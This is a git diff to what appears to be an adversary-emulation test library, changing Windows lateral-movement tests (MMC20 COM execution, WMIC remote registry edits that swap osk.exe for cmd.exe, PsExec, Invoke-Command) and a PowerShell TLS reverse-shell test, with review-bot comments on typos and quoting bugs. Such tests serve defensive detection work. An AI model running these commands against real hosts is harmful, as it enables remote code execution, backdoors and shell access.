diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md
index d77820b7..8c71217e 100644
--- a/atomics/T1028/T1028.md
+++ b/atomics/T1028/T1028.md
@@ -63,11 +63,11 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 | computer_name | Name of Computer | string | computer1|
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `powershell`!
-```cmd
-powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+```powershell
+[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
 ```
diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml
index fa76b9a4..32c67e10 100644
--- a/atomics/T1028/T1028.yaml
+++ b/atomics/T1028/T1028.yaml
@@ -3,134 +3,134 @@ attack_technique: T1028 display_name: Windows Remote Management atomic_tests: -- name: Enable Windows Remote Management - description: | - Powershell Enable WinRM + - name: Enable Windows Remote Management + description: | + Powershell Enable WinRM - Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. + Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. - supported_platforms: - - windows + supported_platforms: + - windows - executor: - name: powershell - elevation_required: true - command: | - Enable-PSRemoting -Force + executor: + name: powershell + elevation_required: true + command: | + Enable-PSRemoting -Force -- name: PowerShell Lateral Movement - description: | - Powershell lateral movement using the mmc20 application com object. + - name: PowerShell Lateral Movement + description: | + Powershell lateral movement using the mmc20 application com object. - Reference: + Reference: - https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ + https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ - Upon successful execution, cmd will spawn calc.exe on a remote computer. + Upon successful execution, cmd will spawn calc.exe on a remote computer. 
- supported_platforms: - - windows + supported_platforms: + - windows - input_arguments: - computer_name: - description: Name of Computer - type: string - default: computer1 + input_arguments: + computer_name: + description: Name of Computer + type: string + default: computer1 - executor: - name: command_prompt - command: | - powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") + executor: + name: powershell + command: | + [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") -- name: WMIC Process Call Create - description: | - Utilize WMIC to start remote process. + - name: WMIC Process Call Create + description: | + Utilize WMIC to start remote process. - Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe. + Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe. 
- supported_platforms: - - windows + supported_platforms: + - windows - input_arguments: - user_name: - description: Username - type: String - default: DOMAIN\Administrator - password: - description: Password - type: String - default: P@ssw0rd1 - computer_name: - description: Target Computer Name - type: String - default: Target + input_arguments: + user_name: + description: Username + type: String + default: DOMAIN\Administrator + password: + description: Password + type: String + default: P@ssw0rd1 + computer_name: + description: Target Computer Name + type: String + default: Target - executor: - name: command_prompt - command: | - wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + executor: + name: command_prompt + command: | + wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" -- name: Psexec - description: | - Utilize psexec to start remote process. + - name: Psexec + description: | + Utilize psexec to start remote process. - Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system. + Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system. 
- supported_platforms: - - windows + supported_platforms: + - windows - input_arguments: - user_name: - description: Username - type: String - default: DOMAIN\Administrator - password: - description: Password - type: String - default: P@ssw0rd1 - computer_name: - description: Target Computer Name - type: String - default: localhost - psexec_exe: - description: Path to PsExec - type: string - default: "C:\\PSTools\\PsExec.exe" + input_arguments: + user_name: + description: Username + type: String + default: DOMAIN\Administrator + password: + description: Password + type: String + default: P@ssw0rd1 + computer_name: + description: Target Computer Name + type: String + default: localhost + psexec_exe: + description: Path to PsExec + type: string + default: "C:\\PSTools\\PsExec.exe" - dependencies: - - description: | - PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - prereq_command: | - if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} - get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force + dependencies: + - description: | + PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) + prereq_command: | + if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force - executor: - name: command_prompt - command: | - #{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe + executor: + name: 
command_prompt + command: | + #{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe -- name: Invoke-Command - description: | - Execute Invoke-command on remote host. + - name: Invoke-Command + description: | + Execute Invoke-command on remote host. - Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. - supported_platforms: - - windows - input_arguments: - host_name: - description: Remote Windows Host Name - type: String - default: localhost - remote_command: - description: Command to execute on remote Host - type: String - default: ipconfig - executor: - name: powershell - command: | - invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} + supported_platforms: + - windows + input_arguments: + host_name: + description: Remote Windows Host Name + type: String + default: localhost + remote_command: + description: Command to execute on remote Host + type: String + default: ipconfig + executor: + name: powershell + command: | + invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} diff --git a/atomics/T1032/T1032.md b/atomics/T1032/T1032.md index 5fa35b0f..08b6e2bb 100644 --- a/atomics/T1032/T1032.md +++ b/atomics/T1032/T1032.md @@ -35,7 +35,7 @@ Upon successful execution, powershell will make a network connection to 127.0.0. ```powershell $server_ip = #{server_ip} $server_port = #{server_port} -$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port}) +$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}') $stream = $socket.GetStream() $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false) 
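Review bot: The PowerShell Lateral Movement executor still carries the misspelled COM property `Documnet` on the new side of its command (`.Documnet.ActiveView.ExecuteShellCommand(...)`); the MMC20.Application object exposes `Document`, so as written the test fails on a property lookup instead of exercising the technique, and the matching T1028.md hunk has the same typo — the fix is to replace `Documnet` with `Document` in both files. With the executor switched to `powershell`, the description's "cmd will spawn calc.exe" is now stale and could read `Upon successful execution, powershell will spawn calc.exe on a remote computer.`. The Psexec prereq_command in the same hunk, `if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}`, appears to carry an unbalanced quote through the reindent (it is present on the old side too), and its get_prereq_command runs `New-Item -ItemType Directory ("#{psexec_exe}")` on the executable path before copying PsExec.exe to that same path, which looks like it would create a directory where the file should go; both seem worth a separate fix rather than being preserved by this reindent.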
diff --git a/atomics/T1032/T1032.yaml b/atomics/T1032/T1032.yaml index f238ca06..f939093f 100644 --- a/atomics/T1032/T1032.yaml +++ b/atomics/T1032/T1032.yaml @@ -11,18 +11,16 @@ atomic_tests: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. - + supported_platforms: - windows input_arguments: server_ip: - description: - IP of the external server + description: IP of the external server type: String default: 127.0.0.1 server_port: - description: - The port to connect to on the external server + description: The port to connect to on the external server type: String default: 443 executor: @@ -31,7 +29,7 @@ atomic_tests: command: | $server_ip = #{server_ip} $server_port = #{server_port} - $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port}) + $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}') $stream = $socket.GetStream() $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false) @@ -45,6 +43,3 @@ atomic_tests: $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()} - - -
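Review bot: Quoting `'#{server_port}'` in the `New-Object Net.Sockets.TcpClient` call fixes only one of the bare substitutions in this executor: the two preceding assignments `$server_ip = #{server_ip}` and `$server_port = #{server_port}` still substitute unquoted values, and with the default `127.0.0.1` the first is, as far as I can tell, not valid PowerShell syntax (a dotted literal outside quotes). Those two variables are also never read — the TcpClient line substitutes `#{server_ip}` and `#{server_port}` directly — so the simplest fix is to drop both assignment lines, or quote them (`$server_ip = '#{server_ip}'`, `$server_port = '#{server_port}'`) and pass `$server_ip, $server_port` to the constructor. The generated T1032.md hunk mirrors the same three lines and needs the same change. The executor's command block continues past this hunk.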